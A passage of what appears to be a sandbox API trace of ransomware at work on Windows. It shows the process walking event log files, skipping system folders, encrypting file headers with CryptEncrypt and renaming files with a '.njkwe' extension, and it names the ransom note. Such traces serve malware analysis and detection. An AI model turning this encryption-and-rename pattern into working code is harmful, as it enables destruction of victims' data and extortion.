0xbe0000 [0065.745] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.745] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0065.745] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="Windows") returned -1 [0065.745] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0065.745] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="System Volume Information") returned -1 [0065.745] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="Program Files") returned -1 [0065.745] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0065.745] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 83 [0065.745] StrStrIW (lpFirst="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0065.745] lstrcmpW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.745] lstrcmpW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="taridd") returned -1 [0065.745] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.745] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.746] GetTickCount () returned 0x1150d6a [0065.746] GetTickCount () returned 0x1150d6a [0065.746] GetTickCount () returned 0x1150d6a [0065.746] GetTickCount () returned 0x1150d6a [0065.746] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.746] GetProcessHeap () returned 0xbe0000 [0065.746] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.746] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.748] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.748] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.748] GetProcessHeap () returned 0xbe0000 [0065.749] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.749] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.749] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.751] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.751] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.751] CloseHandle (hObject=0x428) returned 1 [0065.779] GetProcessHeap () returned 0xbe0000 [0065.779] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.779] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 103 [0065.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.780] GetProcessHeap () returned 0xbe0000 [0065.780] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.780] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0065.780] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="Windows") returned -1 [0065.780] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="$Recycle.bin") returned 1 [0065.780] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="System Volume Information") returned -1 [0065.780] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="Program Files") returned -1 [0065.780] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="Program Files (x86)") returned -1 [0065.780] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 57 [0065.780] StrStrIW (lpFirst="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpSrch=".njkwe") returned 0x0 [0065.780] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.780] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="taridd") returned -1 [0065.780] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.780] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.780] GetTickCount () returned 0x1150d99 [0065.780] GetTickCount () returned 0x1150d99 [0065.780] GetTickCount () returned 0x1150d99 [0065.780] GetTickCount () returned 0x1150d99 [0065.780] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.780] GetProcessHeap () returned 0xbe0000 [0065.780] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.780] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.783] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.783] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.783] GetProcessHeap () returned 0xbe0000 [0065.783] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.783] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.783] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.783] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.783] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.783] CloseHandle (hObject=0x428) returned 1 [0065.788] GetProcessHeap () returned 0xbe0000 [0065.788] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.788] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx_r00t_{3sXlE5}.njkwe") returned 77 [0065.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.788] GetProcessHeap () returned 0xbe0000 [0065.788] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.789] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="Windows") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="$Recycle.bin") returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="System Volume Information") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="Program Files") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="Program Files (x86)") returned -1 [0065.789] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 60 [0065.789] StrStrIW (lpFirst="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpSrch=".njkwe") returned 0x0 [0065.789] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.789] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="taridd") returned -1 [0065.789] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.789] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.789] GetTickCount () returned 0x1150d99 [0065.789] GetTickCount () returned 0x1150d99 [0065.789] GetTickCount () returned 0x1150d99 [0065.789] GetTickCount () returned 0x1150d99 [0065.789] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.789] GetProcessHeap () returned 0xbe0000 [0065.789] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.789] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.791] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.791] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.791] GetProcessHeap () returned 0xbe0000 [0065.791] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.791] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.791] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.792] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.792] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.792] CloseHandle (hObject=0x428) returned 1 [0065.794] GetProcessHeap () returned 0xbe0000 [0065.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.794] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0065.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.795] GetProcessHeap () returned 0xbe0000 [0065.795] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.795] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0065.795] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="Windows") returned -1 [0065.795] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="$Recycle.bin") returned 1 [0065.795] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="System Volume Information") returned -1 [0065.795] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="Program Files") returned -1 [0065.795] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="Program Files (x86)") returned -1 [0065.795] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 69 [0065.795] StrStrIW (lpFirst="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpSrch=".njkwe") returned 0x0 [0065.795] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.795] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="taridd") returned -1 [0065.795] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.795] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.795] GetTickCount () returned 0x1150d99 [0065.795] GetTickCount () returned 0x1150d99 [0065.795] GetTickCount () returned 0x1150d99 [0065.795] GetTickCount () returned 0x1150d99 [0065.795] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.795] GetProcessHeap () returned 0xbe0000 [0065.795] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.795] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.797] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.797] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.797] GetProcessHeap () returned 0xbe0000 [0065.797] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.797] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.798] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.798] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.798] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.798] CloseHandle (hObject=0x428) returned 1 [0065.800] GetProcessHeap () returned 0xbe0000 [0065.800] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.800] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx_r00t_{3sXlE5}.njkwe") returned 89 [0065.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.800] GetProcessHeap () returned 0xbe0000 [0065.800] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.800] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="Windows") returned -1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="$Recycle.bin") returned 1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="System Volume Information") returned -1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="Program Files") returned -1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="Program Files (x86)") returned -1 [0065.800] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 68 [0065.800] StrStrIW (lpFirst="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpSrch=".njkwe") returned 0x0 [0065.800] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.801] lstrcmpW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="taridd") returned -1 [0065.801] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.801] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.801] GetTickCount () returned 0x1150d99 [0065.801] GetTickCount () returned 0x1150d99 [0065.801] GetTickCount () returned 0x1150d99 [0065.801] GetTickCount () returned 0x1150d99 [0065.801] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.801] GetProcessHeap () returned 0xbe0000 [0065.801] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) 